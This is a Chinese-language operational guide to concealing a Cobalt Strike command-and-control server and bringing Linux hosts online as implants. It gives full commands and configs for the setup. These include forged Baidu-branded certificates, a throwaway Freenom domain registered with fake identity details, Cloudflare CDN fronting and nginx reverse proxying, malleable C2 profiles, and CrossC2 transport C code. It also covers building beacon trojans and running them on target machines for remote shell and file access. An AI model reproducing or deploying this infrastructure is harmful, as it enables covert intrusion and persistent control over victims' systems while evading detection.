C2服务器隐藏与Linux上线
字数 1489 2025-08-24 16:48:07
C2服务器隐藏与Linux上线技术指南
一、工具准备
- 国外服务器一台
- 自由鲸(VPN)
- Cobalt Strike 4.4
- nginx
二、C2服务器基础配置
1. 服务器禁ping
# 编辑配置文件
vim /etc/sysctl.conf
# 添加以下内容
net.ipv4.icmp_echo_ignore_all=1
# 使配置生效
sysctl -p
效果:使服务器无法被ping通,但nmap仍可检测到服务器存活状态
2. 修改C2默认端口
# 编辑teamserver文件
vim teamserver
# 搜索50050,修改为任意端口(如65000)
# 保存后启动teamserver
./teamserver xx.xx.xx.xx xiao
三、证书修改
方法一:生成新密钥库(推荐)
# 删除原有密钥库
rm -f cobaltstrike.store
# 生成新密钥库
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname "CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN"
# 转换密钥库格式
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
# 查看证书
keytool -list -keystore cobaltstrike.store
方法二:修改启动文件
- 编辑teamserver文件
- 修改密钥库生成命令部分为上述生成命令
- 删除原有cobaltstrike.store文件
- 下次启动时会自动生成新密钥库
四、使用CDN隐藏
1. 申请免费域名(Freenom)
- 访问Freenom官网
- 获取随机域账号
- 使用临时邮箱验证
- 填写生成器生成的个人信息
- 选择并注册免费域名(如xxx.tk)
2. Cloudflare CDN配置
- 登录Cloudflare添加站点
- 选择免费计划
- 添加DNS记录(A记录指向C2服务器IP)
- 修改域名DNS服务器为Cloudflare
- 关闭自动HTTPS重写和始终使用HTTPS
- 关闭Brotli压缩
3. SSL/TLS配置
- 设置加密模式为"完全"
- 在SSL/TLS->源服务器中创建证书
- 保存公钥(server.pem)和私钥(server.key)
4. 证书打包
# 生成PKCS12格式证书
openssl pkcs12 -export -in server.pem -inkey server.key -out www.xxx.tk.p12 -name www.xxx.tk -passout pass:123456
# 转换为store格式
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.tk.store -srckeystore www.xxx.tk.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.tk
五、C2配置文件
1. 创建cloudflare.profile
https-certificate {
set keystore "www.xxx.tk.store";
set password "123456";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "www.xxx.tk";
}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "www.xxx.tk";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "www.xxx.tk";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}
2. 验证配置文件
创建c2lint文件:
vim c2lint
内容:
java -XX:ParallelGCThreads=4 -XX:+UseParallelGC -classpath ./cobaltstrike.jar c2profile.Lint $1
执行验证:
./c2lint cloudflare.profile
六、Nginx反向代理配置
1. 安装Nginx
apt install nginx
nginx -v
2. 修改配置文件
cd /etc/nginx/sites-enabled
sudo vim default
内容:
server{
listen 443 ssl http2;
server_name www.xxx.tk;
root /var/www/https;
index index.html;
ssl_certificate /opt/zs/server.pem;
ssl_certificate_key /opt/zs/server.key;
}
server{
listen 80;
server_name www.xxx.tk xxx.tk;
return 301 https://www.xxx.tk;
}
3. 创建测试页面
cd /var/www
mkdir https
cd https
vim index.html
内容:hello,I am is https!
4. 重启Nginx
sudo nginx -s reload
sudo systemctl restart nginx.service
七、启动C2服务器
./teamserver xx.xx.xx.xx 123456 cloudflare.profile
八、生成Windows木马
- 创建HTTPS监听器(注意Cloudflare免费版支持的端口)
- HTTP: 80, 8080, 8880, 2052, 2082, 2086, 2095
- HTTPS: 443, 2053, 2083, 2087, 2096, 8443
- 生成exe木马
- 运行木马,验证上线
九、Linux上线配置
1. Cloudflare缓存配置
创建规则:
- 条件:
ip.src == xx.xx.xx.xx(C2服务器真实IP) - 操作:选择"绕过缓存"
2. Nginx高级配置
http {
server{
listen 443 ssl;
server_name aaa;
root /var/www/https;
index index.html;
ssl_certificate /opt/zs/server.pem;
ssl_certificate_key /opt/zs/server.key;
ssl_session_timeout 5m;
ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers on;
location /aaaaaaaaa {
proxy_pass https://127.0.0.1:9090/aaaaaaaaa;
expires off;
proxy_redirect off;
proxy_set_header X-Forworded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
}
location /bbbbbbbbb {
proxy_pass https://127.0.0.1:9090/bbbbbbbbb;
expires off;
proxy_redirect off;
proxy_set_header X-Forworded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Real-IP $remote_addr;
}
}
}
3. 修改c2profile.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
printf("cc2_get_send\n");
char *requestBody = "GET /%s HTTP/1.1\r\n"
"Host: www.xxx.tk\r\n"
"Accept-Encoding: gzip, br\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1\r\n"
"Cookie: SESSION=%s\r\n"
"Connection: close\r\n\r\n";
char postPayload[20000];
sprintf(postPayload, requestBody, "aaaaaaaaa", reqData);
*outputData_len = strlen(postPayload);
*outputData = (char *)calloc(1, *outputData_len);
memcpy(*outputData, postPayload, *outputData_len);
}
void cc2_rebind_http_post_send(char *reqData, char *id, char **outputData, long long *outputData_len) {
printf("cc2_post_send\n");
char *requestBody = "POST /%s?SESSION=%s HTTP/1.1\r\n"
"Host: www.xxx.tk\r\n"
"Accept-Encoding: gzip, br\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1\r\n"
"Connection: close\r\n"
"Content-Length: %d\r\n\r\n%s";
char *postPayload = (char *)calloc(1, strlen(requestBody)+strlen(reqData)+200);
sprintf(postPayload, requestBody, "bbbbbbbbb", id, strlen(reqData), reqData);
*outputData_len = strlen(postPayload);
*outputData = (char *)calloc(1, *outputData_len);
memcpy(*outputData, postPayload, *outputData_len);
free(postPayload);
}
char *find_payload(char *rawData, long long rawData_len, char *start, char *end, long long *payload_len) {
if (rawData != NULL) {
char *s = strstr(rawData, start);
char *e = strstr(rawData, end);
if (s && e) {
rawData = s + strlen(start);
*payload_len = strlen(rawData) - strlen(e);
char *payload = (char *)calloc(*payload_len ,sizeof(char));
memcpy(payload, rawData, *payload_len);
return payload;
}
}
*payload_len = 0;
return NULL;
}
void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
printf("cc2_get_recv\n");
char *start = "ffffffff1";
char *end = "eeeeeeee2";
long long payload_len = 0;
*outputData = find_payload(rawData, rawData_len, start, end, &payload_len);
*outputData_len = payload_len;
}
void cc2_rebind_http_post_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
printf("cc2_post_recv\n");
char *start = "ffffffff1";
char *end = "eeeeeeee2";
long long payload_len = 0;
*outputData = find_payload(rawData, rawData_len, start, end, &payload_len);
*outputData_len = payload_len;
}
4. 更新cloudflare.profile
https-certificate {
set keystore "www.xxx.tk.store";
set password "123456";
}
http-get {
set uri "/aaaaaaaaa";
set verb "GET";
client {
header "Accept" "accccccc";
header "Host" "www.xxx.tk";
header "Referer" "http://www.xxx.tk/";
header "Accept-Encoding" "gzip, deflate";
metadata {
base64url;
prepend "SESSION=";
header "Cookie";
}
}
server {
header "Server" "nginx";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "charset=utf-8";
output {
base64;
prepend "ffffffff1";
append "eeeeeeee2";
print;
}
}
}
http-post {
set uri "/bbbbbbbbb";
set verb "POST";
client {
header "Accept" "accccccc";
header "Host" "www.xxx.tk";
header "Referer" "http://www.xxx.tk/";
header "Accept-Encoding" "gzip, deflate";
id {
base64;
parameter "SESSION";
}
output {
base64;
print;
}
}
server {
header "Server" "nginx";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "charset=utf-8";
output {
mask;
base64url;
prepend "ffffffff1";
append "eeeeeeee2";
print;
}
}
}
十、启动C2并配置客户端
-
启动C2服务器:
./teamserver xx.xx.xx.xx 123456 cloudflare.profile -
下载并加载CrossC2插件:
- CrossC2-GithubBot-2022-06-07.cna
- CrossC2Kit_Loader.cna
-
创建监听器(端口9090)
-
验证公网访问:
- https://www.xxx.tk/ → 200
- https://www.xxx.tk/aa → 404
- https://www.xxx.tk/aaaaaaaaa → 200
十一、生成Linux木马
-
下载genCrossC2.Linux和c2profile.c到C2服务器
-
编译so文件:
gcc c2profile.c -o libc2.so -fPIC -shared -
生成Linux木马:
./genCrossC2.Linux www.xxx.tk 443 .cobaltstrike.beacon_keys libc2.so Linux x64 a.out
十二、Linux机器上线
-
上传a.out到目标机器
-
赋予执行权限并运行:
chmod +x a.out ./a.out
十三、交互操作
1. 命令执行
- 右键会话 → "会话交互"
- 输入Linux命令:
shell whoami shell ifconfig
2. 文件操作
- 右键 → "Expore" → "文件浏览器"
- 可查看、上传、下载文件
3. 进程查看
- 右键 → "Expore" → "Process List"
- 查看目标机器进程信息
以上为完整的C2服务器隐藏与Linux上线技术指南,涵盖了从基础配置到高级隐藏技术的所有关键步骤。